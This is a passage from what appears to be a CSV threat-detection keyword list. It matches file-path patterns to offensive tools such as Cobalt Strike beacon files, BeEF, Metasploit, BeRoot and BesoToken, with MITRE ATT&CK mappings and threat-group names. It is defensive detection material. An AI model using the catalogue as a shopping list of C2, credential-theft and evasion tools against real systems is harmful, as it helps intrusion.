tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/bash_completion.d/exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/bash_executor/*.go","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/bashexplode/boko*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*/Bashfuscator*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*/Bates.csproj*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/batik_svg*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bazarloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/bbaranoff/CVE-2022-0847/*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" +"*/beacon.h","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"*/beacon_202_no_acl.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/beacon_257-objects.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/beacon_compatibility*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*/beacon_compatibility.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*/beacon_funcs/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/beacon_health_check/*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" +"*/beacon_http/*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/beacon_notify.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/BeaconChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/beaconhealth.cna*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" +"*/beacon-injection/*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*/beacon-object-file*","offensive_tool_keyword","cobaltstrike","Cobaltstrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/realoriginal/beacon-object-file","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/BeaconTool.java*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/beef.git*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef/extensions/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef_bind_shell/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef_common.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beefbind/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beefproject/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/Ben0xA/*","offensive_tool_keyword","Github Username","Github username of known powershell offensive modules and scripts","T1059 - T1027 - T1064 - T1086 - T1191 - T1202","TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Ben0xA","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/BeRoot.git*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*/beRoot.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*/beroot.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/BesoToken.cpp*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*/BesoToken.exe*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*/BesoToken.git*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*/bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/bh_owned.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/bhqc.py -*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"*/BIFFRecordEncryption.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/bin/0d1n*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/bin/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 